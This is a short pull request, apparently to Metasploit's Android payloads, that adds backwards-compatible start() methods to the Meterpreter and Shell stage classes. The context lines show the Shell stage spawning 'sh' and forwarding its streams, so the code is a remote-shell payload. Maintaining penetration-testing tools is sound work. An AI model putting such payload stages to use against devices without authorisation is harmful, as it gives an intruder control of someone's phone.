### PR TITLE
fix metasploit-framework/issues/7458

### DIFF
--- a/java/androidpayload/library/src/androidpayload/stage/Meterpreter.java
+++ b/java/androidpayload/library/src/androidpayload/stage/Meterpreter.java
@@ -13,6 +13,14 @@ import dalvik.system.DexClassLoader;
  */
 public class Meterpreter {
 
+    // This is for backwards compatiblity with older (pre #136) payloads
+    public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+        Object[] newParams = new Object[2];
+        newParams[0] = parameters[0];
+        newParams[1] = null;
+        start(in, out, newParams);
+    }
+
     public void start(DataInputStream in, OutputStream out, Object[] parameters) throws Exception {
         String path = (String) parameters[0];
         String filePath = path + File.separatorChar + "met.jar";

--- a/java/androidpayload/library/src/androidpayload/stage/Shell.java
+++ b/java/androidpayload/library/src/androidpayload/stage/Shell.java
@@ -12,6 +12,11 @@ import javapayload.stage.StreamForwarder;
  */
 public class Shell {
 
+    // This is for backwards compatiblity with older (pre #136) payloads
+    public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+        start(in, out, null);
+    }
+
     public void start(DataInputStream in, OutputStream out, Object[] parameters) throws Exception {
         final Process proc = Runtime.getRuntime().exec("sh");
         new StreamForwarder(in, proc.getOutputStream(), out).start();


### PR DESCRIPTION
This change fixes https://github.com/rapid7/metasploit-framework/issues/7458 by retaining backwards compatibility with payloads generated with older versions of the framework.
